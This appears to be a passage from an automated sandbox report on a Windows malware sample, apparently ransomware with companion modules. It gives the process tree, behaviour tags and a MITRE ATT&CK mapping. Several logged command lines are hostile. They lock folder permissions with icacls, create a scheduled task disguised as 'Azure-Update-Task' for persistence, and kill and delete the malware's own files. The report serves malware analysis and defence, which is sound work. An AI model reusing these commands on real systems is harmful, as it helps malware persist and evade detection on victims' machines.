C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
-
-
C:\Users\Admin\AppData\Local\Temp\13DE.exe"C:\Users\Admin\AppData\Local\Temp\13DE.exe" --Admin IsNotAutoStart IsNotTask3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\13DE.exe"C:\Users\Admin\AppData\Local\Temp\13DE.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\ea494335-d205-4064-8eaa-c513a14c0ad3\build2.exe"C:\Users\Admin\AppData\Local\ea494335-d205-4064-8eaa-c513a14c0ad3\build2.exe"5⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\ea494335-d205-4064-8eaa-c513a14c0ad3\build2.exe"C:\Users\Admin\AppData\Local\ea494335-d205-4064-8eaa-c513a14c0ad3\build2.exe"6⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\ea494335-d205-4064-8eaa-c513a14c0ad3\build2.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f8⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\Users\Admin\AppData\Local\ea494335-d205-4064-8eaa-c513a14c0ad3\build3.exe"C:\Users\Admin\AppData\Local\ea494335-d205-4064-8eaa-c513a14c0ad3\build3.exe"5⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\ea494335-d205-4064-8eaa-c513a14c0ad3\build3.exe"C:\Users\Admin\AppData\Local\ea494335-d205-4064-8eaa-c513a14c0ad3\build3.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- Creates scheduled task(s)
-
-
-
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {1906D76F-1CFA-4475-B549-E3C1C3886F4B} S-1-5-21-2375386074-2889020035-839874990-1000:AFOWCZMM\Admin:Interactive:[1]1⤵
-
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"4⤵
- Creates scheduled task(s)
-
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\atetbaaC:\Users\Admin\AppData\Roaming\atetbaa2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\atetbaaC:\Users\Admin\AppData\Roaming\atetbaa2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
-
-
C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exeC:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exe --Task2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exeC:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exe --Task3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
-
-
C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exeC:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exe --Task2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exeC:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exe --Task3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1856 -s 6924⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
-
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\atetbaaC:\Users\Admin\AppData\Roaming\atetbaa2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exeC:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exe --Task2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exeC:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exe --Task3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3444 -s 6884⤵
- Program crash
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\43D5.exeC:\Users\Admin\AppData\Local\Temp\43D5.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20210916204031.log C:\Windows\Logs\CBS\CbsPersist_20210916204031.cab1⤵
- Drops file in Windows directory
-
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua /installsource scheduler1⤵
-
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua /installsource scheduler1⤵
Network
MITRE ATT&CK Enterprise v6
Persistence
Hidden Files and Directories
2Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Disabling Security Tools
1File and Directory Permissions Modification
1Hidden Files and Directories
2Install Root Certificate
1Modify Registry
4Virtualization/Sandbox Evasion
1Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
288KB
-
Filesize
39.4MB
-
Filesize
4KB
-
Filesize
860KB
-
Filesize
848KB
-
Filesize
6.3MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
240KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
348KB
-
Filesize
348KB
-
Filesize
4KB
-
Filesize
44KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
39.4MB
-
Filesize
188KB
-
Filesize
80KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
84KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.2MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
328KB
-
Filesize
328KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
572KB
-
Filesize
152KB
-
Filesize
100KB
-
Filesize
572KB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
1.5MB
-
Filesize
152KB
-
Filesize
1.5MB
-
Filesize
100KB
-
Filesize
80KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
124KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
80KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
136KB
-
Filesize
136KB
-
Filesize
136KB
-
Filesize
4KB
-
Filesize
136KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
216KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
860KB
-
Filesize
8KB